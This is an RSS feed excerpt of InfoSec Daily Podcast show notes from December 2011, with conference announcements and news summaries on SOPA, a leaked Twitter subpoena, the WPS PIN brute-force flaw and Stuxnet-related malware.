	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">New Job</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Getting hired on as a security consultant has been awesome and I&rsquo;d like to thank everyone who made that possible.(they know who they are) &nbsp;I was in tech once upon a time but in a different capacity around the turn of the millennium. &nbsp;In hindsight, I probably should have stuck with it but I had NO IDEA about the community that existed and didn&rsquo;t really know how to plug into it. &nbsp;Being in the community is truly brain augmentation. &nbsp;If I don&rsquo;t know something, I know hundreds of people to ask and they are always happy to help.</span><br />
	<span id="internal-source-marker_0.27175888425579486" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">0) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Bonus</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Karthik and his girlfriend coming up to Seattle for a visit on my recommendation. &nbsp;That was a fun weekend and I&rsquo;ve never eaten so much good food in such a short timespan. &nbsp;&nbsp;His girlfriend could have done a better job of maintaining control over her stomach contents though and Boris wasn&rsquo;t the first ISD member to fall asleep on a show but at least Karthik wasn&rsquo;t snoring.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wish you and your families a Very Happy New Year</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We would like to thank all of our listeners, friends and families for the encouragement and support. &nbsp;&nbsp;We never expected to have such a large listenership when there are so many choices on the Internet, it certainly feels like we&rsquo;re just one of the 80 million or so other security podcasts. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Until Next Year. &nbsp;Be Safe!</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-556-nuclear-option-lapd-hurd-asshat-move-apple-phishing-geordys-top-6/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3316/0/infosec-daily-podcast-episode-556.mp3" length="22493663" type="audio/mpeg" />
		<itunes:duration>0:46:49</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 556 for December 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 556 for December 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.dailykos.com/story/2011/12/29/1049815/-Internet-giants-seriously-considering-nuclear-option-to-stop-SOPA
	When the home pages of Google.com, Amazon.com, Facebook.com, and their Internet allies simultaneously turn black with anti-censorship warnings that ask users to contact politicians about a vote in the U.S. Congress the next day on SOPA, you&#39;ll know they&#39;re finally serious.
	True, it would be the political equivalent of a nuclear option&#8211;possibly drawing retributions from the the influential politicos backing SOPA and Protect IP&#8211;but one that could nevertheless be launched in 2012.
	&#34;There have been some serious discussions about that,&#34; says Markham Erickson, who heads the NetCoalition trade association that counts Google, Amazon.com, eBay, and Yahoo as members. &#34;It has never happened before.&#34;
	&#8230;
	Source: &#160;http://www.computerworld.com/s/article/9222932/Plans_to_migrate_LAPD_to_Google_s_cloud_apps_dropped
	Bad news [if you&#8217;re a cloud aficionado&#8230;], apparently Google Inc.&#8217;s cloud resident email and applications products have been rejected by a single component of the City of Los Angeles, namely the Los Angeles Police Department. Evidently, the products do not meet United States Department of Justice and Federal Bureau of Investigation security guidelines for law enforcement agencies (in this case CJIS). We do applaud the LAPD for it&#8217;s decision to protect and defend it&#8217;s confidential information.
	&#8230;.
	Source: &#160;http://news.cnet.com/8301-30686_3-57349688-266/former-hp-ceo-mark-hurd-loses-appeal-to-keep-letter-sealed
	Mark Hurd, Hewlett-Packard&#39;s former CEO and now the current president of Oracle, lost his fight in court this week to keep confidential a letter alleging sexual harassment.
	A Delaware court ruled yesterday that Hurd had not established &#34;good cause[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 555 &#8211; Subpoena Leak, Don’t Fear The Reaver, Stuxnet Cousins, Trion, MS11-100 &amp; Karthik’s Top 5</title>
		<link>http://www.isdpodcast.com/episode-555-subpoena-leak-dont-fear-the-reaver-stuxnet-cousins-trion-ms11-100-karthiks-top-5</link>
		<comments>http://www.isdpodcast.com/episode-555-subpoena-leak-dont-fear-the-reaver-stuxnet-cousins-trion-ms11-100-karthiks-top-5#comments</comments>
		<pubDate>Fri, 30 Dec 2011 01:56:01 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3313</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 555 for December 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 555 for December 29, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://mashable.com/2011/12/28/leaked-twitter-subpoena-raises-online-privacy-issues/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2011/12/28/leaked-twitter-subpoena-raises-online-privacy-issues/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The leaked subpoena sent to Twitter this month by the Suffolk District Attorney&#39;s Office in Boston is causing some hoopla on the web and raising the issue of law enforcement&#39;s access to online personal data. On Dec. 14, the D.A.&#39;s Office issued a subpoena to Twitter in order to access the account information of two users who tweeted a list of personal information they allegedly obtained by hacking into the Boston Police Patrolmens&#39; Association. The hackers stole identifying information and Tweeted it to followers. The subpoena requests &quot;available subscriber information, for the account or accounts associated with the following information, including IP address logs for account creation.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the subpoena, assistant D.A. Benjamin A. Goldberger requests that the investigation be kept from the Twitter users as to not impede the ongoing probe. But the information was leaked. We reached out to Twitter for comment, but have yet to hear back.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Dec. 23 one of the accounts under investigation, @p0isAn0N Tweeted, &quot;Haha. Boston PD submitted to Twitter for my information. Lololol? For what? Posting info pulled from public domains? #comeatmebro.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The D.A.&#39;s office requested details of two Twitter users and also listed the name Guido Fawkes, which is the name but not handle listed for one of the accounts under investigation, as well as the hashtags #BostonPD and #d0xcak3.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the accounts being probed is listed in the subpoena as @OccupyBoston, however that account appears to be inactive. It&#39;s likely they meant @Occupy_Boston, which Tweets about the occupy movement. Targeting this account has lead some to speculate that the police are monitoring the online activity of occupy protestors.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter&#39;s website contains an information section for law enforcement. It states that if a subpoena is issued for a user&#39;s information, the company will inform that user before they hand the information to the authorities, unless it is prevented from doing so by court order or statute. According to its site, Twitter was following protocol by informing the user of the subpoena, and, perhaps later providing that user&#39;s information to the Boston D.A. This isn&#39;t the first time Twitter has been reluctant to hand-over user information to law enforcement.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.zdnet.com/blog/networking/wi-fi-protected-setup-is-busted/1808"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/networking/wi-fi-protected-setup-is-busted/1808</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://seclists.org/fulldisclosure/2011/Dec/484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://seclists.org/fulldisclosure/2011/Dec/484</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard for easy establishment of a wireless home network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Created by the Wi-Fi Alliance and officially launched on January 8, 2007, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up the encryption method WPA, as well as making it easy to add new devices to an existing network without entering long passphrases. &nbsp;The U.S. </span><a href="http://www.cert.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Computer Emergency Readiness Team (CERT)</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has confirmed that security researcher Stefan Viehb&ouml;ck has found a security hole big enough to drive a network through WPS.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Viehb&ouml;ck, he took a look at </span><a href="http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">WPS and found &ldquo;a few really bad design decisions which enable an efficient brute force attack</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, thus effectively breaking the security of pretty much all WPS-enabled Wi-Fi routers. As all of the more recent router models come with WPS enabled by default, this affects millions of devices worldwide.&rdquo; CERT agrees.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How bad is it? CERT states that &ldquo;An attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The problem is, as </span><a href="http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Viehb&ouml;ck explains in detail</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (PDF Link) is that when the device&rsquo;s personal identification number (PIN), which is usually implemented as a simple physical or virtual push-button, authentication fails the access point will send an Extensible Authentication Protocol-Negative Acknowledgement (EAP-NACK ), which are sent in away that lets a hacker know if the first half of the PIN is right. Then, armed with that information, the attacker will be able to figure out the PIN&rsquo;s last digit of the PIN is known since it&rsquo;s is a checksum number for the entire PIN. What all that means is that it becomes much easier to work out a PIN. To be exact, with the worse luck in the world it would take a cracker 11.000 attempts to break the code.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://tech2.in.com/news/social-networking/researchers-prove-that-stuxnet-weapon-has-at-least-4-cousins/268302"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tech2.in.com/news/social-networking/researchers-prove-that-stuxnet-weapon-has-at-least-4-cousins/268302</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Stuxnet virus that last year damaged Iran&#39;s nuclear program was likely one of at least five cyber weapons developed on a single platform whose roots trace back to 2007, according to new research from Russian computer security firm Kaspersky Lab.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security experts widely believe that the United States and Israel were behind Stuxnet, though the two nations have officially declined to comment on the matter.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Pentagon spokesman on Wednesday declined comment on Kaspersky&#39;s research, which did not address who was behind Stuxnet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stuxnet has already been linked to another virus, the Duqu data-stealing trojan, but Kaspersky&#39;s research suggests the cyber weapons program that targeted Iran may be far more sophisticated than previously known.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky&#39;s director of global research &amp; analysis, Costin Raiu, told Reuters on Wednesday that his team has gathered evidence that shows the same platform that was used to build Stuxnet and Duqu was also used to create at least three other pieces of malware.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Raiu said the platform is comprised of a group of compatible software modules designed to fit together, each with different functions. Its developers can build new cyber weapons by simply adding and removing modules.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s like a Lego set. You can assemble the components into anything: a robot or a house or a tank,&quot; he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky named the platform &quot;Tilded&quot; because many of the files in Duqu and Stuxnet have names beginning with the tilde symbol &quot;~&quot; and the letter &quot;d.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers with Kaspersky have not found any new types of malware built on the Tilded platform, Raiu said, but they are fairly certain that they exist because shared components of Stuxnet and Duqu appear to be searching for their kin.</span><br />
